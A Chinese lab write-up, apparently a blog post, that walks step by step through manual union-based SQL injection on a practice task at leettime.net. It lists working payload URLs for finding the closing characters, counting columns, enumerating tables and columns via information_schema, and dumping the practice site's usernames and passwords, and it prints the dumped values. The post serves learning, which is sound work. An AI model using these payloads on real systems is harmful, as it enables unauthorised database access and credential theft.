2019-08-03簡(jiǎn)單SQL注入的手工測(cè)試

SQL注入在線練習(xí)平臺(tái)(http://leettime.net)

練習(xí)基礎(chǔ)模塊4

1、判斷閉合字符和列數(shù)

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1


正常顯示內(nèi)容

雙引號(hào)閉合 " 顯示正常頁面這個(gè)就不是閉合字符

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22

雙引號(hào)和單引號(hào)閉合 "' 顯示報(bào)錯(cuò)頁面這個(gè)就不是閉合字符

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22%27


由圖片來開還有括號(hào)的存在 )

嘗試閉合字符 -- - 成功

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20or%201=1%20--%20-


接下來獲取表的列數(shù)

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%202%20--%20-


http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20-


order by 5 -- -這個(gè)報(bào)錯(cuò)說明 數(shù)據(jù)表的列數(shù)為4

2、獲取數(shù)據(jù)的數(shù)據(jù)回顯點(diǎn)和數(shù)據(jù)獲取

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,2,3,4%20--%20-

數(shù)據(jù)在第二行的地方可以查詢回顯數(shù)據(jù)

數(shù)據(jù)庫查詢 leettime_761wHole

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,database(),3,4%20--%20-

查詢數(shù)據(jù)安裝的路徑/usr/@@basedir

找出表名? testtable1,userlogs,users

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20-

找出列明id,username,password,user_type,sec_code

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27leettime_761wHole%27%20and%20table_name=%27users%27),3,4%20--%20-

Username is : #injector#khan#,#decompiler#hacktract#,#devilhunte#dante#,#Zen#sec-idiots#,#Zenodermus#security-i#,#grayhat#hacker#,#khan#haxor#,#admin#sadmin#

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(0x23,username,0x23,password,0x23)%20from%20leettime_761wHole.users),3,4%20--%20-

總結(jié):注意熟悉information_schama這個(gè)表的結(jié)構(gòu),還有注意group_concat使用

https://zhuanlan.zhihu.com/p/76518525

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容